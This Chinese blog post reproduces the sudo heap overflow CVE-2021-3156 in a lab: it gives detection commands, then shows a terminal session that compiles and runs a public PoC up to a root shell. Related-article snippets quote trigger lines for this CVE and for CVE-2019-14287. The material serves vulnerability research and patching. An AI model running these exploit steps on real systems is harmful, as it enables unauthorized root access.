复现--Linux sudo权限提升漏洞(CVE-2021-3156)

最新推荐文章于 2024-06-01 21:43:54 发布
最新推荐文章于 2024-06-01 21:43:54 发布
阅读量2.1k 收藏 1
点赞数 1
分类专栏: 漏洞利用 文章标签: linux ubuntu
本文链接:https://blog.csdn.net/dreamerrrrrr/article/details/113484947
版权

前言

  网上已经有了很多的相关复现文章,但是还是有一些疑问,比如:

  • 普通用户如果有sudo权限的话,已经可以执行root用户能执行的命令,再去提权好像意义不大。

漏洞概述

  该漏洞是类Unix操作系统在命令参数中转义反斜杠时存在基于堆的缓冲区溢出漏洞。当sudo通过-s-i命令行选项在shell模式下运行命令时,它将在命令参数中使用反斜杠转义特殊字符。但使用-s-i标志运行sudoedit时,实际上并未进行转义,从而可能导致缓冲区溢出
  只要存在sudoers文件(通常是 /etc/sudoers),攻击者就可以使用本地普通用户利用sudo获得系统root权限。

影响版本

  • sudo 1.8.2 - 1.8.31p2
  • sudo 1.9.0 - 1.9.5p1

漏洞检测

1.查看版本
sudo --version
2. 执行sudoedit -s /命令看报错

使用非root的账户登录系统,运行sudoedit -s / 命令
若返回以sudoedit:开头的错误,则当前系统可能存在安全风险。
不受影响的系统将显示以usage:开头的错误响应。
(不知道为啥我验证的时候并没有报错,直接提示我输入密码…,但是sudo版本在影响范围内)

环境准备

  • 华为云VPS(Ubuntu 18.04.4 LTS、Sudo version 1.8.21p2)

  • 创建新用户test-1无sudo权限

  • 下载大佬的EXP(没办法,自己太菜了)

开始

test-1@dreamer:/home$ cd test-1/
test-1@dreamer:~$ ls
CVE-2021-3156_nss_poc_ubuntu.tar.gz
test-1@dreamer:~$ tar -zxvf CVE-2021-3156_nss_poc_ubuntu.tar.gz 
CVE-2021-3156/
CVE-2021-3156/hax.c
CVE-2021-3156/lib.c
CVE-2021-3156/Makefile
test-1@dreamer:~$ ls
CVE-2021-3156  CVE-2021-3156_nss_poc_ubuntu.tar.gz
test-1@dreamer:~$ cd CVE-2021-3156/
test-1@dreamer:~/CVE-2021-3156$ ls
hax.c  lib.c  Makefile

解压后,进入文件夹开始编译:

test-1@dreamer:~/CVE-2021-3156$ make
rm -rf libnss_X
mkdir libnss_X
gcc -o sudo-hax-me-a-sandwich hax.c
gcc -fPIC -shared -o 'libnss_X/P0P_SH3LLZ_ .so.2' lib.c
test-1@dreamer:~/CVE-2021-3156$ ls
Makefile  hax.c  lib.c  libnss_X  sudo-hax-me-a-sandwich

执行sudo-hax-me-a-sandwich

test-1@dreamer:~/CVE-2021-3156$ ./sudo-hax-me-a-sandwich 0

** CVE-2021-3156 PoC by blasty <peter@haxx.in>

using target: 'Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31'
** pray for your rootshell.. **
[+] bl1ng bl1ng! We got it!
# id
uid=0(root) gid=0(root) groups=0(root),1003(test-1)
#

成功

其它

1:
  • 普通用户采用以上方法提权时需要在exp执行的目录有权限(比如自己的家目录),否则编译时会提示无权创建文件夹等错误
2:

  如果普通用户有sudo权限(即用户已经写入/etc/sudoers文件中)再用此漏洞提权并不是多此一举。

(刚开始想着都有sudo权限了,可以执行root用户所能执行的命令还提什么权啊)

  查了之后知道sudo并不是能执行root所有的命令,(或者说不是所有命令都能加sudo前缀的)如fdisk磁盘分区工具。root是可以对任何文件进行删除的,更可以删除系统文件导致无法启动。相反普通用户和sudo命令都无法进行删除的。

具体区别可以参考:

当然,有sudo权限已经可以做很多事情了。

问题

  1. 复现的时候发现sudo后边好像不能跟cd命令,不能通过执行sudo cd进root用户组的目录

    看了相关文章说是sudo权限没法带进目录,user和group为root的目录就只能在su的情况下进,sudo cd是不允许的

    原因:
    cd是shell的内置命令不是程序所以sudo不行

相关链接:

安服仔
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
Linux sudo权限提升漏洞(CVE-2021-3156)
不想当脚本小子的脚本小子
01-31 248
1月26日,Sudo发布安全通告,修了一个类Unix操作系统在命令参数中转义反斜杠时存在基于堆的缓冲区溢出漏洞。当sudo通过 -s 或 -i 命令行选项在shell模式下运行命令时,它将在命令参数中使用反斜杠转义特殊字符。但使用 -s 或 -i 标志运行 sudoedit 时,实际上并未进行转义,从而可能导致缓冲区溢出。因此只要存在sudoers文件(通常是 /etc/sudoers),攻击者就可以使用本地普通用户利用sudo获得系统root权限漏洞影响版本 Sudo 1.8.2 - 1.8
Linux sudo权限提升漏洞CVE-2021-3156)
锋刃科技的博客
01-30 4070
漏洞概述 1月26日,Sudo发布安全通告,修了一个类Unix操作系统在命令参数中转义反斜杠时存在基于堆的缓冲区溢出漏洞。当sudo通过-s或-i命令行选项在shell模式下运行命令时,它将在命令参数中使用反斜杠转义特殊字符。但使用-s或-i标志运行sudoedit时,实际上并未进行转义,从而可能导致缓冲区溢出。只要存在sudoers文件(通常是/etc/sudoers),攻击者就可以使用本地普通用户利用sudo获得系统root权限。请受影响的用户尽快采取措施进行防护。 影响版本 ...
分析|CVE-2021-3156-sudo堆溢出高危漏洞
zhangge3663的博客
01-29 585
编辑前言 Qualys的安全研究人员于1月13日发文称,攻击者无需知道用户密码即可成功利用此漏洞,在众多基于 Linux 的发行版本中获得最高的 root 权限。受影响的 Sudo 漏洞版本包括从 1.8.2 到 1.8.32p2 的经典版本,以及从 1.9.0 到 1.9.5p1 所有稳定版本。 调试方式 首先从github下载代码: https://github.com/sudo-project/sudo/archive/SUDO_1_9_5p1.tar.gz 编译 tar xf su
sudo堆缓冲区溢出提权漏洞CVE-2021-3156)
Ryan的博客
01-13 2766
sudo堆缓冲区溢出提权漏洞CVE-2021-3156)
CVE-2021-3156】——漏洞、原理分析以及漏洞
最新发布
IronmanJay的博客
06-01 2014
2021年01月27日,RedHat官方发布了Sudo缓冲区/栈溢出漏洞的风险通告,普通用户可以通过利用此漏洞,而无需进行身份验证,成功获取Root权限
[漏洞分析] CVE-2021-3156 sudo提权分析及exp调试修改
热门推荐
Breeze的博客
01-24 1万+
本文提供CVE-2021-3156漏洞的docker调试环境;并对该漏洞原理以及利用细节、堆布局方法进行详细分析。
漏洞Sudo缓存溢出提权漏洞CVE-2021-3156)
qq_50854662的博客
02-14 560
漏洞Sudo缓存溢出提权漏洞CVE-2021-3156)
CVE-2021-3156 sudo堆溢出分析与利用
qq_41252520的博客
01-29 1639
CVE-2021-3156 0x0 简介 sudo是Linux比较常用的命令,它允许普通用户获得临时的root身份执行特权指令,保障了Linux系统的安全。 0x1 漏洞 【环境】:ubuntu18.04 【版本】:sudo-1.8.27 ​ 输入以下POC: sudoedit -s '\' `perl -e 'print "A" x 65536'` 0x2 漏洞分析 (1)环境搭建 首先通过输入命令查看当前系统使用的版本 sudo --version 下载合适的sudo,解压并编译。 (2
Sudo缓冲区溢出漏洞(CVE-2021-3156)
04-06
linux sudo升级为1.9.5p2 及以上版本,sudo-1.9.10-1.el7.x86_64.rpm
CVE-2021-3156:有关CVE-2021-3156的注意事项
05-24
CVE-2021-3156 注意:这些说明是我自己的,并摘自我做过的信息流。 如果有任何问题,请通知我。 首先信任官方消息! 大家好, 几天前,在sudo中发了严重的基于堆的缓冲区溢出,任何本地用户都可以利用该缓冲区...
centos7-sudo-1.9.9.rpm包。修CVE-2021-3156,Sudo堆缓冲区溢出漏洞
01-30
此为centos7版的最新sudo-1.9.9.rpm包,修CVE-2021-3156漏洞。 升级步骤: 1、将RPM包上传到服务器上, 2、执行升级命令: # rpm -Uvh sudo-1.9.9-1.el7.x86_64.rpm 3、执行完毕后,查询sudo版本: # sudo -V
sudo-1.9.12p1,解决cve-2022-43995
11-08
"sudo-1.9.12p1"是sudo的一个特定版本,该版本发布是为了修一个重要的安全漏洞CVE-2022-43995。 **sudo的基础知识** sudo的核心功能在于提供一种受控的权限提升机制,以增强系统的安全性。它通过sudoers文件来...
CVE-2021-3156:Sudo男爵Samedit漏洞
03-25
该存储库是针对Linux x64的CVE-2021-3156漏洞利用。 如需撰写文章,请访问 。 档案文件 使用tcache在glibc上利用 exploit_nss.py自动检测/etc/nsswitch.conf中的所有要求和条目数 exploit_nss_manual.py exploit_...
Sudo堆溢出漏洞(CVE-2021-3156)
蚁景网安学院
06-28 1066
2021 年 1 月 26 日,Qualys Research Labs在 sudo了一个缺陷。sudo 解析命令行参数的方式时,错误的判断了截断符,从而导致攻击者可以恶意构造载荷,使得sudo发生堆溢出,该漏洞在配合环境变量等分配堆以及释放堆的原语下,可以致使本地提权。
Linux sudo堆溢出漏洞CVE-2021-3156)
m0_59598029的博客
01-11 209
2021年01月27日,RedHat官方发布了sudo 缓冲区/栈溢出漏洞的风险通告,普通用户可以通过利用此漏洞,而无需进行身份验证,成功获取root权限漏洞POC已在互联网上公开,提醒Linux系统管理员尽快修。方式1、CentOS修方式:sudo yum -y install sudo。方式2、下载软件包安装,Sudo 1.9.5p2或更新版本。开头的报错,那么表明补丁已经生效。开头的报错,那么表明存在漏洞
CVE-2021-3156:隐藏10年之久的 Sudo 漏洞,可使任意用户获得root 权限(详述)
smellycat000的专栏
01-27 991
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士团队Qualys 公司的研究团队在几乎所有主流 Unix 类操作系统都部署的 sudo 中发了一个隐藏近10年之久的堆溢出漏洞...
Sudo 堆缓冲区溢出致本地提权漏洞(CVE-2021-3156)
qq_42947816的博客
05-29 3026
2021年1月26日,Sudo发布安全通告,修了一个类Unix操作系统在命令参数中转义反斜杠时存在基于堆的缓冲区溢出漏洞。当sudo通过-s或-i命令行选项在shell模式下运行命令时,它将在命令参数中使用反斜杠转义特殊字符。但使用-s或 -i标志运行sudoedit时,实际上并未进行转义,从而可能导致缓冲区溢出。
Linux sudo权限提升漏洞CVE-2021-3156)
reaido的博客
02-02 550
一、背景 sudo是linux系统管理指令,是允许系统管理员让普通用户执行一些或者全部的root命令的一个工具,如halt,reboot,su等等。这样不仅减少了root用户的登录 和管理时间,同样也提高了安全性。sudo不是对shell的一个代替,它是面向每个命令的。 二、特性 § sudo能够限制用户只在某台主机上运行某些命令。 § sudo提供了丰富的日志,详细地记录了每个用户干了什么。它能够将日志传到中心主机或者日志服务器。 § sudo使用时间戳文件来执行类似的“检票”系统。当用户调用sudo并且
linux sudo提权漏洞,linux CVE-2019-14287 Sudo提权漏洞(示例代码)
05-19
CVE-2019-14287是一个sudo提权漏洞,攻击者可以利用此漏洞绕过sudo的限制,以root用户的身份执行命令。这个漏洞影响sudo 1.8.28版本之前的所有版本。下面是一个示例代码: ``` $ sudo -u#-1 id uid=0(root) gid=0...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值